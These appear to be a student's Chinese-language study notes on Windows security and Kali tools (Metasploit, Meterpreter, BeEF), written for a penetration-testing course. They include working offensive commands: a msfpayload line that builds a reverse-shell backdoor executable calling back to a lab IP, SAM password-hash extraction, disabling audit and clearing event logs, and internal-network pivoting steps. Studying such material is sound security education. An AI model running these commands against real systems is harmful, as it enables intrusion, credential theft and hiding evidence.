课程学习

1.windows操作系统内核实现的核心机制有：

1)Windows进程和线程管理机制

2)Windows内存管理机制

3)Windows文件管理机制（NTFS）

4)Windows注册表管理机制（注册表中的系统自启动挂接点上注册的应用软件可以随系统引导而自动运行，因此也是很多恶意代码及流氓软件普遍的攻击目标）

5)Windows的网络机制（从OSI网络参考模型的物理层到应用层，各层上对应的Windows网络组件模块）

2.Windows授权与访问控制机制

Windows的授权与访问控制机制是基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施。 在Windows服务器操作系统中，用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。 Windows对于系统中所有需保护的资源都抽象成对象，具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等，而对每个对象会关联一个SD安全描述符. 对象安全描述符由如下主要属性组成：Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。

3.Windows 远程安全攻防技术

Windows远程攻防技术可以分为以下几大类：远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。 Windows系统上的安全漏洞生命周期：漏洞发现与披露、渗透测试与利用攻击、漏洞修补等。

4.Windows的其他安全机制

身份认证、授权与访问控制以及安全审计是三个基本安全功能。 保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防护。 除安全中心之外，Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等

5.Windows系统口令字密文提取技术

在本地获取口令字密文的主要包括如下三种途径：

1)从另一种操作系统启动后拷贝文件系统中的口令密文文件

2)利用硬盘修复工具包中的rdisk工具，执行rdisk/s-命令创建SAM备份文件副本

3)使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文

6.Windows消踪灭迹

1)关闭审计功能（Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能）

2)清理事件日志（使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志）

视频学习

一、KaliSecurity 漏洞利用之检索与利用

searchsploit

searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp，命令searchsploit wordpress列出了漏洞和文件地址。

查看列出的文件，例：

二、KaliSecurity 漏洞利用之Metasploit基础

Metasploit在渗透测试中经常被用到。这套软件包括了很多工具，这些工具组成了一个完整的攻击框架。

1.启动服务

在Kali中使用metasploit，需要先启动Postgre SQL数据库服务和metasploit服务，然后就可以完整的利用msf数据库查询exploit和记录。

service postgresql start
service metasploit start

如果 不想每次开机都手动启动服务，可以配置随系统启动 update-rc.d postgresql enable update-rc.d metasploit enable

2.路径介绍

Kali中msf的路径为/usr/share/metasploit-framework

Auxiliary:辅助模块 encoders：供msfencode编码工具使用，具体可以使用msfencode -l。

exploits：攻击模块，每个介绍msf的文章都会提到那个ms08_067_metapi，它就在这个目录。

payloads：这里面列出的是攻击载荷，也就是攻击成功后执行的代码，比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post：后渗透阶段模块，在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里。

3.基本命令

msfpayload：用来生成payload或者shellcode。

搜索的时候可以用msfpayload -l | grep "windows"这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode：msf中的编码器，早期为了编码绕过AV，现在常用msfpayload与它编码避免exploit的坏字符串。

1)输入msfconsole，打开msf：

2)发现漏洞，使用命令nmap -sV 192.168.1.124

3)使用set设置参数：

三、KaliSecurity 漏洞利用之Meterpreter介绍

Meterpreter是metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell链接。

Meterpreter作为后渗透模块有多种类型，并且命令由核心命令和扩展库命令组成，极大的丰富了攻击方式。其有很多有用的功能，如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清楚应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

常用的命令：

background：将当前会话放置后台

load/use：加载模块

Interact：切换进一个信道

migrate：迁移进程

run：执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本，常用的有autoroute，hashdump，arp_scanner，multi_inject等

Resource：执行一个已有的rc脚本常用的Meterpreter类型为：payload/windows/meterpreter/reverse_tcp

针对windows操作系统，反向连接shell，使用起来比较稳定。

生成Meterpreter后门；打开MSF，开启监听（选择exploit/multi/handler）；在目标机器上执行door.exe；

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.113 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为192.168.8.113，LHOST、LPORT为reverse_tcp的参数，可以在msf里查看到（记得把服务启动）*/

四、KaliSecurity 漏洞利用之Metasploit后渗透测试

在跳板获取一定权限后需要积极地向内网主机权限发展，获取指定的目标信息，探查系统漏洞，借助msf已经得到的Meterpreter后门，可以使系列的操作更容易。

1.查看当前网卡、网段信息（使用ifconfig）。可查看到三个网卡，一个是本地网卡，另一个是我们能访问的网卡，还有一个网卡具有内网IP（访问不到，可以ping以下试试）。

2.添加路由表run autoroute -s 10.0.0.1可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。

3.开socket代理，通过使用auxiliary/server/socks4a模块，创建一个socks代理，可以为浏览器，sqlmap，nmap使用。通过代理即可访问内网计算机。

4.通过background和session -i可以自由切换进入session。

5.输入run可以看到在meterpreter上可以做的很多命令。

6.通过run post/可以看到后渗透测试模块

7.获取内网信息run arp_scanner -r 10.0.0.1/24

8.也可以上传文件，做端口转发后进行后续测试,例如upload lcx.exe c:\\传送文件到c盘根目录。

五、KaliSecurity 漏洞利用之BeEF

1.输入命令beef-xss启动BeeF

2.使用默认用户名beef与默认密码beef登录

3.HOOK持续的时间为关闭测试页面为止，在此期间，相当于被控制了，可以发送攻击命令，在Commands模块，我们可以完成很多任务：

其中，4种颜色分别表示：

绿色：该攻击模块可用，且隐蔽性强

灰色：该攻击模块可用，但隐蔽性差

橙色：该用户模块是否可用还有待验证

红色：该攻击模块不可用

4.例如，选取MISC下的Raw JavaScript模块作为测试用例，右端表格有该模块的详细说明，以及一些可用的参数等。输入JavaScript code，点击Excute进行攻击。

5.Proxy功能（代理功能）

选中目标主机，点右键，在菜单中选中Use as Proxy；然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

6.BeFF默认是不加载Metasploit的，如果要使用Metasploit丰富的攻击模块，需要做些配置。

修改/usr/share/beef-xss/config.yaml中的metasploit 一行为true

保证此处IP等信息设置正确（不适用127.0.0.1，需使用本机IP），并修改Custom路径，配置好后，打开msfconsole，运行命令load msgrpc ServerHost=192.168.1.124 Pass=abc123

原文地址：https://www.cnblogs.com/9226ryf/p/8856267.html